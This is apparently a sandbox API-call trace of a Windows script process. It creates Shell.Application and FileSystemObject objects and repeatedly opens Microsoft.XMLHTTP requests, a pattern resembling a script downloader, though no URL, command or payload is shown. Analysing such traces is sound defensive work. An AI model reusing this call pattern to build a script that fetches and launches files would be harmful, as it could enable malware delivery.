	[0856.619] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0856.619] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0856.619] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0856.619] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0856.619] SysStringLen (param_1=0x0) returned 0x0
	[0856.619] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0856.620] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0856.620] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0856.620] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0856.620] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0856.620] ??2@YAPEAX_K@Z () returned 0x62f350
	[0856.620] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0856.620] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0856.620] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0856.620] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0856.620] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0856.630] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0856.630] SysStringLen (param_1=0x0) returned 0x0
	[0856.631] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0856.655] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0856.655] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0856.655] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0856.655] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0856.655] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0856.655] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0864.503] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0864.503] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0864.504] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0864.505] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0864.505] SysStringLen (param_1=0x0) returned 0x0
	[0864.505] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0864.505] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0864.505] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0864.505] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0864.505] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0864.505] ??2@YAPEAX_K@Z () returned 0x62f330
	[0864.506] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0864.506] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0864.506] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0864.506] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0864.506] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0864.506] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0864.506] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0864.509] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0864.509] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0864.509] SysStringLen (param_1=0x0) returned 0x0
	[0864.509] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0864.510] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0864.510] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0864.510] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0864.510] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0864.510] ??2@YAPEAX_K@Z () returned 0x62f310
	[0864.510] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0864.510] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0864.510] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0864.510] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0864.511] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0864.511] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0864.511] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0864.511] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0864.511] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0864.511] SysStringLen (param_1=0x0) returned 0x0
	[0864.511] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0864.512] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0864.512] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0864.512] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0864.512] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74c8) returned 0x0
	[0864.512] ??2@YAPEAX_K@Z () returned 0x62f330
	[0864.512] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74c8, pUnkSite=0x62f330) 
	[0864.512] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0864.512] XMLHTTPRequest:IUnknown:Release (This=0x49c74c8) returned 0x0
	[0864.512] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0864.512] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0864.512] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0864.512] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0864.513] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0864.513] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0864.513] SysStringLen (param_1=0x0) returned 0x0
	[0864.513] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0864.513] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0864.513] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bb0) returned 0x0
	[0864.513] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0864.513] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0864.513] ??2@YAPEAX_K@Z () returned 0x62f310
	[0864.513] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0864.513] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0864.513] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0864.513] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bb0) returned 0x0
	[0864.514] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bb0) returned 0x3
	[0864.514] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0864.514] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bb0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0864.514] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0864.514] longjmp () 
	[0864.514] longjmp () 
	[0864.514] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0864.514] SysStringLen (param_1=0x0) returned 0x0
	[0864.514] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0864.515] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0864.515] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0864.515] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0864.515] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74c8) returned 0x0
	[0864.515] ??2@YAPEAX_K@Z () returned 0x62f330
	[0864.515] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74c8, pUnkSite=0x62f330) 
